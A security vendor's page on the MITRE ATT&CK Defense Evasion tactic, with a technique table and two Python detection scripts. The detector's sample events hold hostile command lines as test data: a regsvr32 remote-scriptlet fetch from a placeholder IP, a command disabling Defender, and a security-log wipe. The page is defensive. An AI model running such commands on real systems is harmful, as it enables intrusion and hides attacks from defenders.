Defense Evasion consists of techniques that adversaries use to avoid detection throughout their compromise. Techniques used for defense evasion include uninstalling/disabling security software or obfuscating/encrypting data and scripts. Adversaries also leverage and abuse trusted processes to hide and masquerade their malware.
Tactic Overview
Tactic ID: TA0005 — Matrix: Enterprise — Techniques: 41
The Defense Evasion tactic represents a phase in the adversary lifecycle where the adversary is trying to avoid being detected. This tactic is part of the MITRE ATT&CK Enterprise matrix and encompasses 41 known techniques that adversaries employ during this phase of an attack.
Understanding this tactic is critical for defenders to build effective detection strategies and implement appropriate countermeasures. Organizations should map their security controls against each technique to identify coverage gaps and prioritize defensive investments.
Techniques (41)
The following techniques are categorized under the Defense Evasion tactic in the MITRE ATT&CK Enterprise matrix:
| Technique ID | Name | Description | MITRE Reference |
|---|---|---|---|
| T1548 | Abuse Elevation Control Mechanism (5 sub-techniques) | Adversaries bypass UAC, sudo caching, or setuid/setgid mechanisms to run code with elevated privileges on compromised systems. | T1548 |
| T1134 | Access Token Manipulation (5 sub-techniques) | Adversaries manipulate access tokens to operate under a different user or system security context, both to evade controls and to escalate privileges. | T1134 |
| T1197 | BITS Jobs | Adversaries abuse the Background Intelligent Transfer Service to download, execute, or clean up after malicious payloads while blending in with legitimate transfers. | T1197 |
| T1612 | Build Image on Host | Adversaries build container images directly on a compromised host to bypass defenses that monitor for the retrieval of malicious images from a registry. | T1612 |
| T1622 | Debugger Evasion | Adversaries check for debugging environments and modify behavior to evade analysis by security researchers. | T1622 |
| T1678 | Delay Execution | Adversaries delay execution of malicious payloads to evade time-based sandbox analysis and detection. | T1678 |
| T1140 | Deobfuscate/Decode Files or Information | Adversaries deobfuscate or decode encrypted/encoded files and data to reveal payloads for execution on the target system. | T1140 |
| T1610 | Deploy Container | Adversaries deploy malicious containers to execute code, bypass security controls, and establish persistence in container environments. | T1610 |
| T1006 | Direct Volume Access | Adversaries directly access logical drives and volumes to bypass file access controls and monitoring. | T1006 |
| T1484 | Domain or Tenant Policy Modification (2 sub-techniques) | Adversaries modify domain-level or tenant-level policies (Group Policy, domain or federation trusts) to weaken defenses or escalate privileges across an environment. | T1484 |
| T1672 | Email Spoofing | Adversaries spoof email sender addresses to bypass filtering and appear as trusted senders. | T1672 |
| T1480 | Execution Guardrails (2 sub-techniques) | Adversaries use environmental checks (system language, domain membership) to ensure payloads only execute on intended targets. | T1480 |
| T1211 | Exploitation for Defense Evasion | Adversaries exploit vulnerabilities to disable or bypass security tools and defensive mechanisms. | T1211 |
| T1222 | File and Directory Permissions Modification (2 sub-techniques) | Adversaries modify file and directory permissions to enable further malicious activity or weaken security controls. | T1222 |
| T1564 | Hide Artifacts (11 sub-techniques) | Adversaries hide files, directories, users, and other artifacts to evade detection using hidden attributes, NTFS ADS, or resource forks. | T1564 |
| T1574 | Hijack Execution Flow (12 sub-techniques) | Adversaries hijack the way programs load code (DLL search order, PATH, dylib) to execute malicious payloads when legitimate programs run. | T1574 |
| T1562 | Impair Defenses (10 sub-techniques) | Adversaries disable or modify security tools, logging, and defensive mechanisms to evade detection throughout their operation. | T1562 |
| T1656 | Impersonation | Adversaries impersonate trusted entities to deceive victims and gain access to systems or information. | T1656 |
| T1070 | Indicator Removal (9 sub-techniques) | Adversaries delete or modify artifacts (logs, files, timestamps) that could reveal their activities on compromised systems. | T1070 |
| T1202 | Indirect Command Execution | Adversaries execute commands indirectly through trusted utilities to bypass application controls and monitoring. | T1202 |
| T1036 | Masquerading (9 sub-techniques) | Adversaries disguise malicious artifacts as legitimate files or processes by manipulating names, locations, and metadata to evade defenses. | T1036 |
| T1556 | Modify Authentication Process (9 sub-techniques) | Adversaries modify authentication mechanisms (for example, password filter DLLs or pluggable authentication modules) so that accounts can be accessed without the valid credentials normally required. | T1556 |
| T1578 | Modify Cloud Compute Infrastructure (4 sub-techniques) | Adversaries modify cloud compute infrastructure (create snapshots, instances) to evade defenses and establish persistence. | T1578 |
| T1666 | Modify Cloud Resource Hierarchy | Adversaries modify organizational structures in cloud environments (accounts, subscriptions, organizational units) to move resources outside the scope of existing policies and monitoring. | T1666 |
| T1112 | Modify Registry | Adversaries modify the Windows Registry to hide configuration information, establish persistence, or enable malicious functionality. | T1112 |
| T1601 | Modify System Image (2 sub-techniques) | Adversaries patch or replace the operating system image of embedded network devices (routers, switches) to weaken defenses and add capabilities for themselves. | T1601 |
| T1599 | Network Boundary Bridging (1 sub-technique) | Adversaries bridge network boundaries to bypass segmentation controls and enable traffic flow between isolated network segments. | T1599 |
| T1027 | Obfuscated Files or Information (17 sub-techniques) | Adversaries encrypt, encode, or obfuscate executables and files to evade detection. Includes software packing, steganography, HTML smuggling, and command obfuscation. Used by APT41, Sandworm, Kimsuky, and Mustang Panda. | T1027 |
| T1647 | Plist File Modification | Adversaries modify property list (plist) files on macOS to hide configuration data and evade detection. | T1647 |
| T1542 | Pre-OS Boot (5 sub-techniques) | Adversaries modify system boot processes (bootkit, UEFI, TFTP boot) to load malicious code before the operating system. | T1542 |
| T1055 | Process Injection (12 sub-techniques) | Adversaries inject code into running processes to evade detection and escalate privileges. Includes DLL injection, process hollowing, APC injection, and thread hijacking. Used by APT32, APT37, APT38, Cobalt Strike, and many RATs. | T1055 |
| T1620 | Reflective Code Loading | Adversaries load code into memory without writing to disk, using reflective DLL injection or in-memory .NET assembly loading. | T1620 |
| T1207 | Rogue Domain Controller | Adversaries register rogue domain controllers using DCShadow to manipulate Active Directory data and evade detection. | T1207 |
| T1014 | Rootkit | Adversaries install rootkits to hide the presence of malicious software and activity at the kernel or firmware level. | T1014 |
| T1679 | Selective Exclusion | Adversaries selectively exclude malicious files or processes from security scanning to avoid detection. | T1679 |
| T1553 | Subvert Trust Controls (6 sub-techniques) | Adversaries undermine security controls that rely on trust mechanisms, such as code signing validation and certificate checks. | T1553 |
| T1218 | System Binary Proxy Execution (14 sub-techniques) | Adversaries abuse signed system binaries (rundll32, mshta, regsvr32, certutil) to proxy execution of malicious code and bypass defenses. | T1218 |
| T1216 | System Script Proxy Execution (2 sub-techniques) | Adversaries abuse signed scripts (PubPrn.vbs, SyncAppvPublishingServer) to proxy execution of malicious code. | T1216 |
| T1221 | Template Injection | Adversaries inject malicious code into document templates to execute payloads when users open templated documents. | T1221 |
| T1205 | Traffic Signaling (2 sub-techniques) | Adversaries use specially crafted network packets to trigger hidden functionality on compromised systems (port knocking, wake-on-LAN abuse). | T1205 |
| T1127 | Trusted Developer Utilities Proxy Execution (1 sub-technique) | Adversaries abuse developer tools (MSBuild, dnx, rcsi) to execute malicious code while bypassing application controls. | T1127 |
Key Technique Deep Dives
The following technique is among the most commonly observed in real-world attacks within this tactic:
T1027: Obfuscated Files or Information
Real-World Usage
- APT41: VMProtected binaries; split malware across disk sections
- Sandworm: Heavily obfuscated code with Industroyer backdoor
- Kimsuky: XOR encryption + Base64 encoding; modified DLL first bytes
- Rocke: Modified UPX headers after packing to break unpackers
Key Mitigations
- M1049 - Antivirus/Antimalware: Automated detection; utilize AMSI on Windows 10+
- M1040 - Behavior Prevention on Endpoint: Enable ASR rules preventing obfuscated payload execution
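The two Kimsuky tricks listed above, XOR encryption plus Base64 encoding and a DLL whose first bytes were modified, are cheap to check for once a file is in hand. The following is an added example written for this page, not Mjolnir's or MITRE's code: it brute-forces a single-byte XOR key behind a Base64 blob until a PE image falls out, flags a file whose DOS stub is intact but whose `MZ` magic has been overwritten, and measures Shannon entropy as a packing indicator. The samples, the `make_pe_like` stand-in for a DLL and the 7.2 bits/byte entropy threshold are all constructed assumptions.

```python
"""Added example (not the page's or MITRE's code): triage helpers for two T1027
tricks described above, Kimsuky-style XOR + Base64 payload encoding and a DLL
whose leading bytes were altered so it no longer presents a PE magic. All samples
below are constructed inline; the entropy threshold is an assumption."""
from __future__ import annotations

import base64
import binascii
import math
from collections import Counter

PE_MAGIC = b"MZ"
DOS_STUB = b"This program cannot be run in DOS mode."
ENTROPY_THRESHOLD = 7.2  # assumed cut-off (bits/byte); packed or encrypted data sits near 8.0


def shannon_entropy(data: bytes) -> float:
    """Bits per byte of the blob; 0.0 for empty input."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def xor_bytes(data: bytes, key: int) -> bytes:
    return bytes(b ^ key for b in data)


def is_pe_image(data: bytes) -> bool:
    """Magic plus the DOS stub text that almost every PE carries in its first 512 bytes."""
    return data.startswith(PE_MAGIC) and DOS_STUB in data[:512]


def header_tampered(data: bytes) -> bool:
    """Kimsuky's trick: the DOS stub survives but the 'MZ' magic was overwritten,
    so scanners that gate on the magic never look at the rest of the file."""
    return not data.startswith(PE_MAGIC) and DOS_STUB in data[:512]


def recover_xor_base64(text: str) -> tuple[int, bytes] | None:
    """Undo Base64, then brute-force a single-byte XOR key; return (key, plaintext)
    when the result is a PE image, else None."""
    try:
        raw = base64.b64decode(text, validate=True)
    except (binascii.Error, ValueError):
        return None
    for key in range(256):
        plain = xor_bytes(raw, key)
        if is_pe_image(plain):
            return key, plain
    return None


def triage(data: bytes) -> list[str]:
    """Return the findings that apply to one blob, in a fixed order."""
    findings: list[str] = []
    if header_tampered(data):
        findings.append("pe-magic-tampered")
    if shannon_entropy(data) > ENTROPY_THRESHOLD:
        findings.append("high-entropy")
    try:
        text = data.decode("ascii").strip()
    except UnicodeDecodeError:
        text = ""
    hit = recover_xor_base64(text) if text else None
    if hit is not None:
        findings.append(f"xor-base64-pe(key=0x{hit[0]:02x})")
    return findings


def make_pe_like(size: int = 512) -> bytes:
    """Constructed stand-in for a DLL: magic, a little padding, the DOS stub, zero fill."""
    body = PE_MAGIC + b"\x90\x00" + b"\x00" * 60 + DOS_STUB + b"\r\n$"
    return body.ljust(size, b"\x00")


# Constructed samples: one clean image, one with its first byte overwritten,
# one XOR(0x5A)+Base64 encoded, and one uniform byte spread standing in for packed code.
SAMPLES = {
    "legit.dll": make_pe_like(),
    "tampered.dll": b"\x00" + make_pe_like()[1:],
    "payload.txt": base64.b64encode(xor_bytes(make_pe_like(), 0x5A)),
    "packed.bin": bytes(range(256)) * 2,
}

if __name__ == "__main__":
    for name, blob in SAMPLES.items():
        print(f"{name:14} entropy={shannon_entropy(blob):.2f} findings={triage(blob)}")
```

The magic-tamper check is the one worth copying: a file that carries the DOS stub string but no `MZ` at offset 0 is not something a compiler produces, so the false-positive rate is close to zero, whereas the entropy threshold needs tuning per file type because compressed resources and legitimately packed installers also score high.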
Detection & Mitigation
Organizations should implement layered defenses addressing each technique within this tactic. Below are key mitigation strategies recommended by Mjolnir Security analysts.
Key Mitigations
- Behavioral-based detection
- AMSI integration
- Code signing enforcement
- Script block logging
- Memory protection (e.g., virtualization-based protections such as Credential Guard)
Detection Strategies
Effective detection of Defense Evasion techniques requires a combination of log analysis, behavioral monitoring, and threat intelligence correlation. Security teams should focus on establishing baselines for normal activity and alerting on deviations that may indicate adversary behavior aligned with this tactic.
- SIEM Integration: Correlate events across multiple data sources to detect technique patterns
- Behavioral Analytics: Deploy UEBA solutions to identify anomalous activity indicative of this tactic
- Threat Hunting: Proactively search for indicators of techniques within this tactic using hypothesis-driven investigations
- Purple Teaming: Regularly test detection coverage by simulating techniques from this tactic
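The baseline-and-deviation approach described above is easiest to see on process-creation telemetry, which is where most Defense Evasion techniques in the table (system binary proxy execution, Impair Defenses, Indicator Removal) first show up. The block below is an added example written for this page, not Mjolnir's detection content: it learns which parent/child process pairs are normal from a constructed history, alerts on pairs it has not seen often enough, and layers technique-specific command-line patterns on top. The Sysmon-style field names, the baseline, the sample events, the regexes and the `min_seen` threshold are all assumptions.

```python
"""Added example (not Mjolnir's or MITRE's detection content): baseline-plus-pattern
detection over process-creation events. Field names follow Sysmon Event ID 1
loosely; the baseline, the sample events, the signature regexes and the
``min_seen`` threshold are all assumptions constructed for this example."""
from __future__ import annotations

import ntpath
import re
from collections import Counter

# Constructed learning-window history of (parent image, child image) pairs.
# A real baseline would be built from weeks of telemetry, per host role.
BASELINE_PAIRS = [
    ("explorer.exe", "chrome.exe"),
    ("explorer.exe", "winword.exe"),
    ("explorer.exe", "cmd.exe"),
    ("services.exe", "svchost.exe"),
    ("svchost.exe", "rundll32.exe"),
] * 20

# Technique-specific command-line patterns (assumed regexes, not MITRE's).
SIGNATURES = [
    ("T1218.011", re.compile(r"rundll32\.exe.*(javascript:|\.(txt|dat|png|jpg)\b)", re.I)),
    ("T1218.005", re.compile(r"mshta\.exe.*(https?://|vbscript:|javascript:)", re.I)),
    ("T1218.010", re.compile(r"regsvr32\.exe.*(/i:|scrobj\.dll|https?://)", re.I)),
    ("T1562.001", re.compile(r"Set-MpPreference.*-Disable\w+", re.I)),
    ("T1070.001", re.compile(r"wevtutil(\.exe)?\s+(cl|clear-log)\b", re.I)),
]


def build_baseline(pairs) -> Counter:
    """Count how often each (parent, child) image-name pair appeared in the learning window."""
    return Counter((p.lower(), c.lower()) for p, c in pairs)


def image_name(path: str) -> str:
    return ntpath.basename(path).lower()


def analyze(event: dict, baseline: Counter, min_seen: int = 5) -> list[str]:
    """Alerts for one event: an unseen parent/child pair first, then technique matches."""
    alerts: list[str] = []
    pair = (image_name(event["parent_image"]), image_name(event["image"]))
    if baseline[pair] < min_seen:
        alerts.append(f"unseen-parent-child:{pair[0]}->{pair[1]}")
    for technique, pattern in SIGNATURES:
        if pattern.search(event["command_line"]):
            alerts.append(technique)
    return alerts


# Constructed events; 198.51.100.7 is a documentation address, not a real C2.
SAMPLE_EVENTS = [
    {"id": "browser-launch", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "command_line": r'"C:\Program Files\Google\Chrome\Application\chrome.exe"'},
    {"id": "control-panel", "parent_image": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Windows\System32\rundll32.exe",
     "command_line": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"},
    {"id": "word-rundll32", "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\rundll32.exe",
     "command_line": r"rundll32.exe C:\Users\Public\update.png,DllRegisterServer"},
    {"id": "squiblydoo", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\regsvr32.exe",
     "command_line": r"regsvr32.exe /s /u /i:http://198.51.100.7/a.sct scrobj.dll"},
    {"id": "defender-off", "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r'powershell.exe -c "Set-MpPreference -DisableRealtimeMonitoring $true"'},
    {"id": "log-wipe", "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\wevtutil.exe",
     "command_line": r"wevtutil.exe cl Security"},
]


def detect_all(events=SAMPLE_EVENTS, pairs=BASELINE_PAIRS) -> dict[str, list[str]]:
    """Run every event through the baseline and the signatures; map event id to alerts."""
    baseline = build_baseline(pairs)
    return {e["id"]: analyze(e, baseline) for e in events}


if __name__ == "__main__":
    for event_id, alerts in detect_all().items():
        print(f"{event_id:14} {alerts or 'clean'}")
```

Note what the two layers buy each other: the `control-panel` event is a legitimate rundll32 launch that the signature layer alone would have to special-case, but the baseline already knows `svchost.exe -> rundll32.exe`, while `word-rundll32` fires on both layers, which is the kind of corroborated hit worth paging on.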
Associated Threat Actors
Threat actors named elsewhere on this page that heavily leverage Defense Evasion techniques include APT41, Sandworm, Kimsuky, Mustang Panda and Rocke (T1027 Obfuscated Files or Information) and APT32, APT37 and APT38 (T1055 Process Injection).
For comprehensive threat actor profiles, visit the APT Groups Hub.
Defend Against Defense Evasion Techniques
Mjolnir Security provides expert threat intelligence, purple team exercises, and detection engineering services to help organizations defend against adversary tactics mapped to the MITRE ATT&CK framework.
Written by Mjolnir Security Research — Published March 7, 2026
